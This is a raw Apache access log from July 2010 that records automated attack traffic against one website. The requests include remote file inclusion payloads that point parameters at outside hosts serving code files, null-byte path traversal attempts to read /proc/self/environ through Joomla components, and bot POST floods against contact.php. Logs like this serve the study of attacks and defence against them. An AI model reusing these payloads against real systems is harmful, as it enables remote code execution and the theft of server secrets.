67.205.67.73 - - [25/Jul/2010:18:27:29 -0700] "GET /logs/access_100510.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:27:32 -0700] "GET /logs/access_100510.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:18:28:30 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:18:28:30 -0700] "GET /skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:18:28:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:28:37 -0700] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:29:12 -0700] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:29:48 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:29:48 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:29:49 -0700] "GET /logs/access_091228.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:18:30:32 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:18:30:32 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:18:30:32 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:30:34 -0700] "GET /logs/access_090921.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:18:30:34 -0700] "GET /logs/access_100503.log%20%20//skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:39 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:39 -0700] "POST /logs/contact.php HTTP/1.0" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:30:39 -0700] "GET /logs/access_091228.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:30:39 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:30:40 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.199.214.177 - - [25/Jul/2010:18:30:44 -0700] "POST /logs/access.log/contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:44 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:44 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:49 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:55 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:18:30:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:18:31:12 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:18:31:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:18:31:12 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:31:24 -0700] "GET /logs/access_090921.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:32:35 -0700] "GET /logs/access_091102.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:32:37 -0700] "GET /logs/access_090921.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:34:35 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:34:35 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:35:18 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:35:18 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:35:18 -0700] "GET /logs/access_091102.log%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:35:25 -0700] "GET /logs/access_100510.log%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:18:36:33 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:18:36:34 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
80.249.166.63 - - [25/Jul/2010:18:36:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
80.249.166.63 - - [25/Jul/2010:18:36:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:18:36:43 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:18:36:43 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.803" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:48 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:48 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:48 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:48 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:48 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:49 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:49 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:49 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:36:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:18:36:51 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:04 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:04 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:18:38:05 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:38:13 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:38:13 -0700] "GET /logs/access_091026.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:38:13 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:38:15 -0700] "GET /logs/access_100222.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:38:15 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:38:15 -0700] "GET /logs/access_100222.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:38:15 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:38:15 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:38:16 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:38:33 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:38:33 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
222.124.193.12 - - [25/Jul/2010:18:38:36 -0700] "GET /logs/access_100719.log/?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.124.193.12 - - [25/Jul/2010:18:38:37 -0700] "GET /?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
222.124.193.12 - - [25/Jul/2010:18:38:38 -0700] "GET /logs/?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.805" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:38:50 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:38:50 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:38:50 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:38:50 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:38:50 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:38:51 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:38:51 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:39:08 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:39:09 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:39:09 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:18:39:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:18:39:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:18:39:09 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:39:11 -0700] "GET /logs/access_100222.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:39:12 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:39:13 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:39:13 -0700] "GET /logs/access_090914.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:39:15 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:39:16 -0700] "POST /logs/access_100215.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:39:17 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:18:39:31 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:18:39:31 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:18:39:31 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:39:38 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:39:38 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:39:39 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:18:41:01 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:18:41:01 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:18:41:01 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
99.198.108.74 - - [25/Jul/2010:18:41:05 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
99.198.108.74 - - [25/Jul/2010:18:41:05 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
173.221.27.163 - - [25/Jul/2010:18:41:10 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
173.221.27.163 - - [25/Jul/2010:18:41:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
173.221.27.163 - - [25/Jul/2010:18:41:10 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:18:41:15 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:18:41:15 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:18:41:24 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:18:41:24 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:41:32 -0700] "GET /logs/access_100222.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:18:41:35 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:18:41:35 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
209.151.164.22 - - [25/Jul/2010:18:41:38 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:43:41 -0700] "GET /logs/access_091109.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
